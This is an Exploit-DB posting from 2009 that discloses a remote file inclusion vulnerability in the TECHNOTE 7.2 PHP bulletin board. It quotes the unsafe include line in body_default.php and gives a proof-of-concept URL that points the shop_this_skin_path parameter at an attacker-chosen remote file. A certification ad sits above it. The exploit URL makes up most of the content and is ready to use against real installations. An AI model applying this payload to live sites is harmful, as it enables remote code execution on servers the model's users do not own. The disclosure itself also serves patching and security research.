Technote 7.2 - Remote File Inclusion

EDB-ID:

7965


Author:

make0day

Type:

webapps


Platform:

PHP

Date:

2009-02-03


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

TECHNOTE 7.2 (08.09.25) Remote File Inclusion Vulnerability
bY make0day@gmail.com

/*************************

TECHNOTE (VERSION 7.2 (08.09.25))is bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But I find Remote File Inclusion vulnerability.
Here is the details:

**************************/
TEST ON VERSION TECHNOTE 7.2 (08.09.25)
Download : http://www.technote.co.kr/
/***************************
Remote File Inclusion Vulnerability

/body_default.php

if($GOODS['gs_input']) include "$shop_this_skin_path/2_view_body/include/form_option.php";
//File Include

*************************/

poc:

http://[site]/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=[RFI]

# milw0rm.com [2009-02-03]